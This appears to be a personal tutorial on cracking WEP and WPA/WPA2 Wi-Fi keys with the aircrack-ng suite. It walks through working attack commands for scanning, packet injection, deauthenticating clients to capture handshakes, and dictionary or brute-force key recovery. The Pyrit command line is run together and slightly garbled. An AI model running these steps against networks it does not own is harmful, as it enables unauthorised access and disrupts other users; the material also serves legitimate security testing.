Cracking WiFi WEP, WPA/WPA2 Networks

Legal notices:

This is forbidden and illegal in most contries. You could end up in jail if cracking networks that do not belong to you!

I was just testing out the software to see how and if it worked. This was all done using MY OWN hardware and Access Points.

Software, Hardware, Access Points and Keys:

OS: Funtoo Linux

Version: aircrack-ng 1.1

CPU: Intel(R) Core(TM)2 Duo CPU     T6670  @ 2.20GHz

Hardware: Intel Corporation PRO/Wireless 5100 AGN [Shiloh] Network Connection

Firmware: iwl5000-ucode 8.83.5.1-r1

AP1:  Thomson SpeedTouch ST7XX-series, WEP, Random 10-char alpha-numeric string. (As used by one of the service providers in my country)

AP2:  Thomson SpeedTouch ST7XX-series, WPA2-Personal, Random 10-digit. (As used by another service provider in my country, means there are a whopping 10^10 possibilities here (10’000’000’000))

Notes:

APs used in article:

00:00:00:00:00:01 - AP1 Above
00:00:00:00:00:02 - AP2 Above

Arguments used in article:

• wlan-device: Normally ‘wlan0’
• monitor-device: Normally ‘mon0’
• chosen-bssid: The ESSID (AP Name) you want to use
• chosen-ap: The BSSID (AP MAC) you want to use
• chosen-channel: The AP’s current Channel
• found-station: A client MAC found while monitoring
• output-file: The filename prefix for output data (I used the name of AP)
• password-lists: A comma separated list with plaintext files with passphrases
• found-key: Found key
• handshake-data: Handshake-data from aircrack-ng (capture file)

Preparations:

• Connection to an Access Point with relative high signal strength and minimal blocking
• Connection to Access Point should have activity and connected Stations (Clients)
• Some heavy CPU power with a lot of cores
• Up too 100G HDD Space
• A good wireless network card, supported by aircrack (and supports packet injection)
• Install aircrack-ng suite
• Make sure you have a lot of free time
• Make sure to disable any network services like NetworkManager, avahi and wpa_supplicant.

Cracking WEP encryption is quite easy and fast, but WPA/WPA2 requires a lot of time and and CPU power.

Step 1 – Recon listening for APs and Stations:

airodump-ng <wlan-device>

   [ CH XX ][ Elapsed: XX s ][ YYYY-MM-DD HH:SS ]

   BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
   00:00:00:00:00:02  -20       23        0    0  11  54e  WPA2 CCMP   PSK  Test_WPA
   00:00:00:00:00:01  -20       23        0    0  11  54e. WEP  WEP         Test_WEP

   BSSID              STATION            PWR   Rate    Lost  Packets  Probes
   01:00:00:00:00:01  00:00:00:00:00:01  -20   48 -54      3      634
   01:00:00:00:00:02  00:00:00:00:00:02  -20   48 -54      3      634

Now you should pick from the top of the list (it’s sorted by signal quality). Also check if
there is some activity (beacon and data packet count). Note down the SSID, ESSID and Channel. If there are any active stations/clients on the network they will appear in the second row.

Step 2 – Starting up monitoring:

airmon-ng start <wlan-device> <chosen-channel>

 Interface Chipset Driver
 wlan0 Intel 4965/5xxx iwlagn - [phy0]
 (monitor mode enabled on mon0)

If successfull you should have a <monitor-device> listed in ‘iwconfig’.
Make sure there are no multiple <monitor-device>s in the list. To remove them
run the command in step 6.

Step 3 – Listen for network data and handshaking:

airodump-ng -c <chosen-channel> --bssid <chosen-bssid> -w <output-file> <monitor-device>

 [ CH XX ][ Elapsed: X hour X mins ][ YYYY-MM-DD HH:SS ][ WPA handshake: 00:00:00:00:00:02 ]

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 00:00:00:00:00:02  -55  96    38107   624522  649  11  54   WPA  CCMP   PSK  Test_WPA

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes
 00:00:00:00:00:02  01:00:00:00:00:02  -20   54 -54    349   608746  Test_WPA

The top list is the current AP, the bottom list is the Stations/Clients connected to the network.
The dumped file can become quite large if running over several hours (since it saves data packages).
You can use the ‘-ivs’ argument to capture just parts of the packets to save space, but this will
only work for WEP encryption (WPA needs whole packets).

WPA/WPA2: If you get a handshake it will be indicated in the top right corner. It’s this handshake we’ll
use to crack the WPA key.

WEP: Try to collect as much #Data as possible (At minimum 20-40k, even though 10k is sometimes is enough)

Step 4 – WEP Encryption:

The basic idea is to capture as much encrypted traffic as possible using airodump-ng.
Each WEP data packet has an associated 3-byte Initialization Vector (IV): after a sufficient
number of data packets have been collected, run aircrack-ng on the resulting capture file.
aircrack-ng will then perform a set of statistical attacks developed by a talented hacker named KoreK.

Since that time, the PTW approach (Pychkine, Tews, Weinmann) has been developed.
The main advantage of the PTW approach is that very few data packets are required to crack the WEP key.

aircrack-ng <output-file>*.cap

After enough data has been collected this command will try to figure out the password.
It may take a while.

This can take quite a while! If a key was found this message will appear:

 KEY FOUND! [ <found-key> ]

Step 4.1 OPTIONAL – Increase traffic on WEP encrypted network (while listening with ‘airodump’)

aireplay-ng -3 -b <chosen-bssid> -h <found-station> -x 50 <monitor-device>

-3 : this specifies the type of attack, in our case ARP-request replay
-b : MAC address of access point
-h : MAC address of associated client from airodump
-x 50 : limit to sending 50 packets per second

Step 5 – WPA/WPA2 Encryption

The Idea here is to collect hand-shakes between the AP and Clients and then store these to a file to later run against a dictionary of words. WPA cannot be cracked as easily as WEP because the key is rotated per-packet. You can read more about this here.

Step 5.1 OPTIONAL – De-authenticate a station for getting handshakes (while listening with ‘airodump’):

aireplay-ng -0 1 -a <chosen-bssid> -c <found-station> <monitor-device>

16:10:21 Waiting for beacon frame (BSSID: 00:00:00:00:00:02) on channel 11
16:10:21 Sending 64 directed DeAuth. STMAC: [01:00:00:00:00:01] [ 0|116 ACKs]

  -0 : means deauthentication
       '1' is the number of deauths to send (you can send multiple if you wish)
  -a : is the MAC address of the access point
  -c : is the MAC address of the client you are deauthing

You should see the PWR in airodump goes down to zero, then returns because the station
re-established the connection and performed a hand-shake.

Step 5.2 – Get some password lists:

You can get them here. After downloading all lists it’s a good idea to concatenate all these files:

cat file1 file2 file3 file4 > WORDS.LST

You can also download this torrent from TPB containing a huge list of the most popular password lists. Download size is about 4GB, when unpacked 13GB.

You can also generate a series of numbers (will become HUGE and takes TIME). This was what I used to create my password list for the WPA encryption. (See top of article)

seq -w 0000000000 9999999999 > NUMBERS.LST # About 100GB in size

Step 5.3 – Cracking the WPA key:

Update: You can use Pyrit to increase the performance dramatically (by including the GPU for calculations). Follow instructions on how to install here (The “pentoo” gentoo overlay contains ebuilds). Gentoo users have to install the dev-python/pyopencl and net-analyzer/scapy package to make Pyrit to compile. Then run:

pyrit eval pyrit -i <password-lists> import_passwords pyrit -e <chosen-ap> create_essid pyrit eval pyrit batch pyrit verify pyrit -o exported_db export_hashdb #export to a hashed database aircrack-ng -r exported_db <output-file>*.cap #import into aircrack for faster results

Old method: This can take quite a while.

aircrack-ng -w <password-lists> <output-file>*.cap

Results: When aircrack is done you should see something like this:

 KEY FOUND! [ <found-key> ]

Step 6 – Shutting down moitoring:

airmon-ng stop <wlan-device>

 Interface Chipset Driver
 wlan0 Intel 4965/5xxx iwlagn - [phy0]
 (monitor mode disabled)

airmon-ng stop <monitor-device>

 Interface Chipset Driver
 wlan0 Intel 4965/5xxx iwlagn - [phy0]
 mon0 Intel 4965/5xxx iwlagn - [phy0] (removed)

Results:

Cracking a WEP key took about 20,000 Packets and under 15 min.

Cracking the WPA key took me 200+ hours using the generated password list, running at about 1300 k/s. This could have taken many more weeks on my computer if the WPA key-number was higher (It was only about 5% done). Note: This was not tested with pyrit.

Some problems I encountered:

The channel selection in ‘airodump’ and ‘aireplay’ was messed up. I could not use the wireless
tools to make it lock on <chosen-channel>.

The messages I got was:

• ‘aireplay’ was saying that the AP and WLAN-adapter was not configured at the same channel
• ‘airodump’ was displaying ‘static channel: -1’ in the top right corner

The fix for this was to set up a local WLAN router, configure it to use channel 11.
Then I connected my computer to the local network, then disconnected and tried using ‘airodump’
again and it worked. Even packet injection using ‘aireplay’ worked.